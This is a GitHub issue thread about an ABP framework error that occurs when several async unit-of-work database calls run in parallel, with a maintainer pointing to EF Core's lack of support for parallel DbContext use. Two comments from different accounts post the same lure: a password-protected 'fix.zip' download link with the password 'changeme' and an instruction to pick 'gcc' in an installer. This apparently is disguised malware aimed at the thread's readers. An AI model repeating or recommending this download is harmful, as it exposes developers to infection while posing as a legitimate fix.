### ISSUE TITLE
Calling multiple Async UOW first time at the same time

### ISSUE THREAD

**Issue by ugurozturk** [abpframework/abp#20660]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description

When i try calling database requests at the same time for the first time, I am having error "This unit of work already contains a database API for the given key".

When i disable UOW, the problem doesn't occur.

https://github.com/abpframework/abp/blob/a226bd185826cdaf170e1fd4ae027c502ac9accd/framework/src/Volo.Abp.Uow/Volo/Abp/Uow/UnitOfWork.cs#L196

### Reproduction Steps

Task<List<TableA>> TableAList = GetIReadOnlyTableAList();
Task<List<TableB>> TableBList = GetIReadOnlyTableBList();
Task<List<TableC>> TableCList = GetIReadOnlyTableCList();

await Task.WhenAll(TableAList, TableBList, TableCList);

### Expected behavior

Calling async tasks multiple times at the same time.

### Actual behavior

Gives error because tries to add the same directory.

### Known Workarounds

Let code bypass it rather than throwing. 

### Version

8.2.0

### User Interface

MVC

### Database Provider

EF Core (Default)

### Tiered or separate authentication server

None (Default)

### Operation System

Windows (Default)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by maliming** [comment]
hi

> Entity Framework Core does not support multiple parallel operations being run on the same DbContext instance. 

https://learn.microsoft.com/en-us/ef/core/dbcontext-configuration/#avoiding-dbcontext-threading-issues

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
